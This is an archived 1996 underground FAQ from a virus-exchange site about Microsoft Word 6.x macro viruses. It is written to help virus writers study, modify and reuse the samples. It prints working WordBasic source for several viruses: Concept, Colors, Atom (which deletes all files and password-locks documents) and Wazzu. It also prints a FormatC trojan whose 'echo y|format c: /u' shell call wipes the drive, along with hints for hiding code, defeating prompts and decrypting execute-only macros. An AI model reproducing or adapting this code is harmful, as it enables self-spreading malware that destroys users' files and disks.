Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

The UNDERGROUND MS WORD 6.x MACRO VIRUSES FAQ V2.0

Aurodreph
1996

[Back to index] [Comments]

What is a word macro virus?

A WORD MACRO Virus, is a macro (list of instructions) or template file (usually with the .DOT extension) which masquerades as legitimate MS WORD documents (usually with the extension *.DOC). An infected *.DOC file, doesn't look any different to the average PC user, as it can still contain a normal document. The difference is that this document is really just a template or macro file, with instructions to replicate, and possibly cause damage. MS WORD will interpret the *.DOT macro/template file regardless of extension, as a template file. This allows for it being passed off as a legitimate document (*.DOC) This FAQ takes the position that a document is meant to be DATA, and a MACRO is at least a partially executable CODE. When a document has been infected, it has been merged with executable code in a multi-part file, part data/part executable. This tends to be hidden from the user, who expects a document to be data that is READ, and not some combination of DATA and executable code designed to be executed, often against the will of the user, to wreck havok.

These viruses commonly tend to infected the global macros, which get automatically saved at the end of each session. When the next session of MS WORD opens, the infected Global Macros are executed, and the WORD Environment is now infected, and will in turn be likely to infect documents whenever they are opened, closed, and created during all future sessions.

As a Virus, the WORD MACRO VIRUSES do REPLICATE. They can spread in most cases to any MS WINDOWS Environment or OS that runs a compatible copy of MS WORD 6.x or 7.x, MS WORD 6.x running on OS/2, as well as WORD for MAC 6.0 for MacOS. This makes it a multi-platform/multi-OS file infector. It also makes it one of the first non-research viruses to be successfully spread to all of these environments and OS's

MS Word Macro Viruses reside in interpreted data that can spread to different OS's/platforms. These viruses do not spread via modification of executable machine code, but by modification of data in files that are interpreted by the Microsoft Word 6.0 program and any other versions of Word that support macros and WordBasic.

WordBasic Macro Language is much simpler to learn and master than ASSEMBLER, or other popular higher Level programming languages, and for this reason, Vx people (both new and old alike) have taken to it as a viable alternative to learning and coding ASM . The thought of ticking users off on more than one platform has been around for years, and now thanks to MS WORD, and all it's compatible versions on other popular platforms, the Vx people have their wish. Another Bonus of this new outlet for Vx writers, is that many virus scanners only scan Executable files, leaving the .DOC files of WORD alone. It is important to note that many AV producers have now included scanners/cleaners to their software, allowing for the detection of existing MS WORD Macro Viruses.

How study a infected document

You are happy, :-) You find the latest macro virus. And now, you want to study it, find the source code and modify it. OK, I'll explain... it's very easy.

First of all, you make a copy of the NORMAL.DOT file (it's in the MSOFFICE\WINWORD\MODELES). In most case, the macro virus isn't dangerous, except for the trojan virus, FORMATC. In fact, when you read the document, it formats C:. So, a good idea is to run a TSR anti-virus like VIRSTOP. Now, you launch the WORD application, and ...(it's the time to execute)... then go to the menu TOOLS/OPTION and in the SAVE directory, click to select the option (ask for saving NORMAL.DOT).

Then you take a look at the file with a hexeditor. A word document is composed of a first part, the data (text), then the macro and in the last part, the data (name of the file,...). OK. Find the name of the document near the end... and look for a "U". if you see some U's, this mean that the macros are encrypted. You will need more time to study because when you copy a macro, WORD gives you the option to READONLY: you can execute the macro, but you can't see the source... If you take a look for the name, you can see the macro of all the macros included in the file. The name can give you a idea of what they do,... but be careful !!

Now, you open the infected document and see what it does. nothing ... It's normal !! Go to the menu TOOLS/MACRO. You can see the name of the macro(the same you see with the hexeditor)

IF you can use the Modify button, the macro is Execute-only... THEN go to the TOPIC 4. Else you read the script and keep what you want...

VIRUS EXAMPLES and what you can keep in mind

I have studied some macro virus for you and I've commented them...

Concept Virus

Also known by the Aliases of WW6Macro, WinWord.Concept, Word Basic Macro Virus (WBMV), Word Macro 9508 (MAC) and Prank Macro (MicroSoft named it Prank, to downplay the seriousness of the situation). This was the first MS Macro Virus to be detected by the Anti-Virus community, and the first Macro Virus to be considered in the wild, with infections spreading to the US, UK, France, Germany, Bulgaria, Canada, the Netherlands, Turkey, and Finland, and other Countries.

A CONCEPT Infection is easy to notice, on the first execution of the virus infected document (on the first opening of the infected file) the MessageBox appears with digit "1" inside, and "Ok" button. Also, simply checking the TOOLS/MACROS option to check loaded macros, the presence of concept is apparent by the appearance of these 5 macros:

AAAZFS *
AAAZAO *
AutoOpen
PayLoad *
FileSaveAs

The infection routine of this virus:

'see if we're already installed
For i = 1 To iMacroCount
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1
End If
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1
End If
Next i
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoOpen and FileSaveAs.
'PayLoad is just for fun.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
sMacro$ = sMe$ + ":Payload"
MacroCopy sMacro$, "Global:PayLoad"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:FileSaveAs"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:AAAZFS"
sMacro$ = sMe$ + ":AAAZAO"
MacroCopy sMacro$, "Global:AAAZAO"

At the end of each Macrocopy, you put ,1 and you have Execute-Only macros... just an idea :)

Nuclear

Known widely as Winword.Nuclear, Wordmacro-Nuclear and Wordmacro-Alert. This virus was the first WordMacro virus to infect (or at least to attempt to infect) both data/documents (Word Documents .DOT and .DOC) as well as executables (.COM/.EXE/NEWEXE)

In truth, it is 2 viruses, a macro virus which alters the Operating Environment of WORD, and an executable file infector (as well as a system file deleter). This makes NUCLEAR the first Macro Virus to also incorporate, or at least try to incorporate a classic File Infector Virus. This virus is actually quite ineffective in the destructive sense, detailed later in this document. The infected documents contains the following nine Macros...

AutoExec
AutoOpen
FileSaveAs
FilePrint
FilePrintDefault
InsertPayload *
Payload *
DropSuriv *
FileExit

which get copied into the GLOBAL Macro List.

General detection of NUCLEAR is easy, simply view the macros listed under the Macros command under the Tools Menu. If Macros "InsertPayload", "Payload", and "DropSuriv" are listed, then you'll likely have a NUCLEAR infection. (unless you named legitimate macros with the same names... :) ) NUCLEAR hides itself from detection, by disabling the "PROMPT FOR CHANGES TO NORMAL.DOT" option. Changes are made, and the user doesn't notice anything.

The "InsertPayload" Macro will cause the following text to be added to the end of printouts when printing documents. Every 12th printout will have the following text added...

And finally I would like to say: STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC!

which is appended to the file after the command to print is issued but prior to the actual printing. FAX's sent via a FAX Print Driver will also be affected, this much I know first hand. From testing, I came to the realization that some Vx putz will start messing with my outgoing faxes behind our backs.

Another included Macro, is "Payload" which tries to delete IO.SYS, MSDOS.SYS and COMMAND.COM on April 5th. It is inaffective, as WordBasic can't reset the attributes of a file which has the System attribute set. It has been noted that a variant that does work is being circulated.

The Second part of the Nuclear Virus is the executable infector. The DropSuriv Macro checks system time, and will attempt to drop the file infector between 17:00/18:00. However, the routine is flawed, and shouldn't work on any system. (fails due to a syntax error - not closed IF statement, which makes this payload never executed) If DropSuriv DID work properly, it would search for the standard DOS util DEBUG.EXE, if found, the macro drops PH33r.SCR & EXEC_PH.BAT. The Bat File is executed, and then the hex dump file PH33r.SCR is converted from a DEBUG script into an executable, and is in turn executed. Later, the .SCR and the .BAT files are deleted to cover its tracks. The File infector then hooks INT 21h and writes itself at the end of COM/EXE/NewEXE files. (however, the memory is released once this DOS task is completed, includes the memory residentvirus Ph33r) Unconfirmed reports state that a NUCLEAR infected Macro with a fully operational DropSuriv Macro exist.

The following text strings are in the executable infector...

=Ph33r=
Qark/VLAD

The virus group VLAD publish it in the issue n4. (I think the entire version of this virus So, found them on the Net.)

Colors

Colors, is the first WINWORD Macro Virus that could be called cute (IMHO). This Virus has the noticeable ability to alter the Windows colors settings.

If iModEvery = (iEvery - 1) Then
sColors$(0) = "Background"
sColors$(1) = "AppWorkspace"
...
sColors$(19) = "InactiveTitleText"
sColors$(20) = "ButtonHilight"

For i = 0 To 20
SetProfileString("colors", sColors$(i), Str$(Int(Rnd() * 256)) + " "
+ Str$(Int(Rnd() * 256)) + " " + Str$(Int(Rnd() * 256)))
Next i
End If

Mac Word is immune to the payload <the system colors attack> but is still susceptable to the infection mechanism, which will attack documents. Detection of infections is easy, as infected documents appear with the template icon, rather than the usual document icon.

Commonly known as Rainbow or WordMacro.Colors, this virus was freely posted to usenet newsgroups on October 14th, 1995. The Colors Virus will infect the global template <usually NORMAL.DOT> upon opening of an infected document. An infected document contains the following macros:

AutoOpen
AutoClose
AutoExec
FileNew
FileExit
FileSave
FileSaveAs
ToolsMacro, and other macros.

All Macros included in COLORS are Execute-Only, and cannot be viewed or edited by MicroSoft Word. If normal "clean" macros with the same names existed prior to infection, they will be overwritten by COLORS.

The AutoExec Macro of COLORS is an EMPTY Macro, possibly designed to defeat any ANTI-MACRO-VIRUS schemes developed by the AV community. It accomplishes this by overwriting a "CLEANING/SCANNER" AutoExec Macro with COLORS empty one, effectively making the AV Scanner/Cleaner useless.

COLORS will also enable AutoMacros in case you were smart and disabled them! It will also disable the MS Word's Prompt to save changes to NORMAL.DOT.

[ OutilsOptionsEnregistrement .InviteGlobalDot = 0 ] Very interesting

COLORS is crafty, as it can spread without the use of AUTO macros... thus defeating the DISABLE AUTOMACROS Feature. It does so via the Macros:

File/New
File/Save
File/SaveAs
File/Exit
Tools/Macro

COLORS will infect NORMAL.DOT whenever a user chooses any of the above functions. It also has limited stealth ability, earning it the title of being the first WINWORD STEALTH MACRO VIRUS. It accomplishes it's stealth actions, by hiding itself from the active listing, since attempting to view active macros would run the COLORS infected Tools/Macro, thus hiding it's own presence while simultaneously infecting your system.

[ MacroTools .Name = sNames$(i), .Print = 1, .Delete ] Good !!!

The COLORS virus will keep track of infections via a counter, named "countersu", which can be found under the [Windows] section of the WIN.INI file. Whenever an infected macro is executed, the counter is incremented by a count of one. It quickly adds up, when you consider how much you OPEN, CREATE, SAVE, EXIT, and CLOSE documents. When the increment counter reaches 299, and every 300th execution thereafter, COLORS will be triggered. COLORS will then make changes to the system colors setup, including text, background, borders, buttons, etc., using randomly determined colors. The new color scheme becomes apparent to the user during the next session of Windows.

Colors ability to spread without the use of AutoExecute Macros, and its use of Advanced Stealth techniques signals a new level of MACRO virus technology. (Hiding itself from view when you actively look for it defines STEALTH in my book, since it evades detection) It also adds fuel to the VxD argument, as an on access scanner could prevent infection by this type of stealthy virus.

You have the complete disassemblie in the previous issue.. so download it...

DMV

Commonly known as WordMacro.DMV, DMV is an unremarkable TEST Virus, possibly the first to be created using the WORDBasic Language. Joel McNamera wrote it in the fall of 1994, as a real time TEST for some MACRO Virus Theories. The Virus was kept under wraps, and a detailed paper was published. This TEST virus was only released, as an educational aid, after the CONCEPT virus was discovered. DMV isn't a threat to anyone, as it announce itself upon infecting the system.

Nothing to say, it's an old virus. and now, all the technique used was detected by most AVX.

HOT

Also known as WORDMACRO HOT, WinWord.Hot.

Not the most ingenious of the Macro Virus Family, it's biggest kick, is the ability to wait or sleep for awhile <up to 14 days> and then delete a file. WordMacro/Hot appears to be the first Word macro virus written in Russia. It was found in the wild in Russia in January 1996.

Infected documents contain four execute-only macros:

AutoOpen
DrawBringInFrOut
InsertPBreak
ToolsRepaginat.

MacIntosh Word Users will notice HOT, by examining the icon of the file... infected documents appear with the template icon, normal documents appear with the normal document icon.

NOTE: WordMacro/Hot appears to be the first macro virus to use external functions, allowing Word macros to call any standard Windows API call. This makes the spreading function Windows 3.x specific, preventing Word for MAC and Word 7 for Win '95 from spreading the Virus. An error dialog will be displayed under Microsoft Word 7.0.

Unable to load specified library

HOT activates automatically via it's AutoOpen Macro (assuming no attempt to disable AutoMacros has been made) adding a line LIKE...

QLHot=34512

to Ms Word for Windows 6's WinWord6.INI file, which acts as a counter recorder system, setting a date 14 days in the future for payload activation.

HOT then copies the included macros to the Global Template, NORMAL.DOT usually, revising their names...

AutoOpen ==> StartOfDoc
DrawBringInFrOut ==> AutoOpen
InsertPBreak ==> InsertPageBreak
ToolsRepaginat ==> FileSave

A listing of the currently loaded macros in this infected environment will reveal the names in the right list. Loading another infected document (actually a template) will add the left list to the macro list plus the right list. NOTE: Macros have been saved with the 'execute-only' feature, which means that a user can't view or edit them.

A clean (AutoMacros disabled) WORD environment will produce the left list when viewing an infected document.

HOT's FileSave macro cause the virus to randomly decide within 1-6 days from the infection date to activate whenever an effort to open files is made. Upon activation, a document will have it's contents deleted, by opening it, slecting the entire contents, delting them, and closing the document, saving it in it's now empty state.

Users with c:\DOS\EGA5.CPI should be protected from this macro, as the author included a check for this file as a protective measure, noted in the source code as follows:

'---------------------------------------------------------------
'- Main danger section: if TodayNo=(QLHotDateNo + RndDateNo) ---
'- and if File C:DOSega5.cpi not exist (not for OUR friends) ---
'---------------------------------------------------------------

HOT's InsertPBreak Macro inserts a page-break in current documents, which is used as a sign of a document already being infection by HOT.

NOTE: WordMacro/Hot relies on the existence of KERNEL.EXE

I can see this macro, if you have it, please send it to the mag.... thanks

MS WORD 2/MS WORD 6.x macro trojan weideroffen

This is a new MACRO Trojan, (that's been around for 2 years) that goes by the alias WinWord.Weideroffnen. It is technically a WinWord 2 infected document, that works eqwually well under MS WORD 6.x. It intercepts AutoClose, and attempts to play tricks with boot-up file AUTOEXEC.BAT.

I haven't seen this macro virus, so I don't know...

WORDMACRO ATOM / ATOMIC

This is a new Macro Virus, found in February 1996, which works along the same general ideas as the original Concept virus. The WordMacro/Atom virus is not known to be in the wild.

The differences, when compared to the Concept Virus, follows:

On December 13th, it's first point of activation occures. It will attempt to delete all files in the current file directory.

The second activation, password protects documents, restricting the users access to their own documents. This happens when the system clock seconds counter equals 13, and a File/Save As command is issued. The passowrd assigned to the documents is ATOM#1.

If the user disables AUTOMACROS, Atom will be unable to execute and spread to other documents. Enabling the Prompt To Save NORMAL.DOT will prevent Atom from attacking and infecting the NORMAL.DOT file.

Here is the source: Keep in mind the idea of put a passwd in a file, not a bad idea....

Macros: Atom

Sub MAIN
On Error Goto KillError
If Day(Now()) = 13 And Month(Now() = 12) Then
Kill "*.*"
End If
KillError:
End Sub

Macros: AutoOpen

Sub MAIN
Dim FN$
FN$ = FileName$()
On Error Goto ErrorInfectGlobalTemplate
If (CheckInfected = 0) Then
MacroCopy FN$ + ":FileSaveAs", "FileSaveAs", 1
MacroCopy FN$ + ":FileOpen", "FileOpen", 1
MacroCopy FN$ + ":AutoOpen", "AutoOpen", 1
MacroCopy FN$ + ":Atom", "Atom", 1
SaveTemplate
End If
Call Atom
ErrorInfectGlobalTemplate:
End Sub

Function CheckInfected
CheckInfected = 0
If (CountMacros(0) >= 4) Then
For I = 1 To CountMacros(0)
If (MacroName$(I, 0) = "Atom") Then
CheckInfected = 1
End If
Next I
End If
End Function

Macros: FileOpen

Sub MAIN
On Error Goto InfError
Dim dlg As FileOpen
GetCurValues dlg
Dialog dlg
FileOpen dlg
MacroCopy "AutoOpen", Dlg.Name + ":AutoOpen", 1
MacroCopy "FileSaveAs", Dlg.Name + ":FileSaveAs", 1
MacroCopy "FileOpen", Dlg.Name + ":FileOpen", 1
MacroCopy "Atom", Dlg.Name + ":Atom", 1
FileSaveAs .Format = 1
InfError:
End Sub

Macros: FileSaveAs

Sub MAIN
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
If (Dlg.Format = 0) Or (Dlg.Format = 1) Then
MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs", 1
MacroCopy "AutoOpen", WindowName$() + ":AutoOpen", 1
MacroCopy "FileOpen", WindowName$() + ":FileOpen", 1
MacroCopy "Atom", WindowName$() + ":Atom", 1
Dlg.Format = 1
End If
If (Second(Now()) = 13) Then ] easy... to block a document
Dlg.Password = "ATOM#1" ] a idea why not put a randomize passwd ?
End If
FileSaveAs dlg
End Sub

FormatC macro trojan

Also known as WORDMACRO.FORMATC, and FORMAT.C.Macro.Trojan

The FORMATC Macro Virus, isn't even a virus, as it DOES NOT SPREAD. This makes it another MACRO TROJAN. This Trojan contains only one macro, AutoOpen, which will be executed automatically when a document is opened. The Macro AutoOpen, is READ ONLY, making it encrypted, and unreadable and editable. It is visiable in the Macro List.

When FORMATC is executed, "triggered", it will run a dos session, in a minimized DOS box. It will run an Unconditional Format of the C drive.

Here is the macro (Basic) but deadly...
Sub MAIN
sCmd$ = "echo y|format c: /u"
Shell Environnement$("COMSPEC") + "/c " + sCmd$, 0
End Sub

If you want to execute DOS command, you have here a hint on how to do it.

WORDMACRO WAZZU

WordMacro/Wazzu consists of a single AutoOpen macro; this makes it language independent, ie. this macro virus is able to infect localized versions of Word as well as the english Word.

It's inserted in your text the word "Wazzu" ... why not.... Nothing more to said, classic...

Sub MAIN
On Error Goto errCaught

FileSummaryInfo .Update
Dim dlg As FileSummaryInfo
GetCurValues dlg

fileMacro$ = dlg.Directory + "" + dlg.FileName + ":autoOpen"
globMacro$ = "Global:autoOpen"
MacroFile$ = UCase$(Right$(MacroFileName$(MacroName$(0)), 10))

If MacroFile$ = "NORMAL.DOT" Then
MacroCopy globMacro$, fileMacro$
FileSaveAs .Format = 1
Else
MacroCopy fileMacro$, globMacro$
End If

Payload

Goto bye
errCaught:

bye:
On Error Goto 0

End Sub

Sub Payload
For i = 1 To 3
If Rnd() < 0.2 Then
RndWord
SelectCurWord
selWord$ = Selection$()
DeleteWord

RndWord
Insert selWord$ + " "
End If
Next

If Rnd() < 0.25 Then
RndWord
Insert "wazzu " <-------------------here's the payload
StartOfDocument
End If

End Sub

Sub RndWord
FileSummaryInfo .Update
Dim dlg As DocumentStatistics
GetCurValues dlg

wordNum = Int(Rnd() * Val(dlg.Words))
StartOfDocument
WordRight wordNum
End Sub

How to do with execute-only macros

Easy, when you copy a macro with the option 1, Microsoft Word encrypts the source of the macro, so when you look at the file, you can't see it.... But, the encryption they use is stupid :))) an XOR value... so the only difficult thing, it's to find the XOR key...you must scan the file and the Xor value is included...

I explain the method: Locate the "real" filename of the document within the document, A few bytes after the end of the name, there is a "U", the byte immediately following is the ... XOR value to use. Now to find the beginning of the macros are usually at B89h or at 1509h. To locate, there is always the sequence A5h C6h 41h then a byte and then the XOR value....

This is the standard method, you must know that each macro has a specific XOR value.. when you look for the filename, you will find as many U's as you have macros in the document.

I encountered some difficulties when the document is composed of encrypted macros and normal macros... In this case, try to delete some macros and decrypt...

I can give you a little C source to help you. This source uses a brutal method, so you will have 1 macro readable by file.... try with the COLORS macro (last issue). I know that the soft. functions well.

This FAQ is Copyright (z) 1996

MicroFuck (tm), Windows, Word, EXCEL are Copyright (z) 1995-96 MicroFuck Corp. All rights reserved to the virus makers...

P.S : sorry but i don't use a ENGLISH version of Word, so some names of the instruction could be incorrect !!! Just use the F1 option and find the nearest name....

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua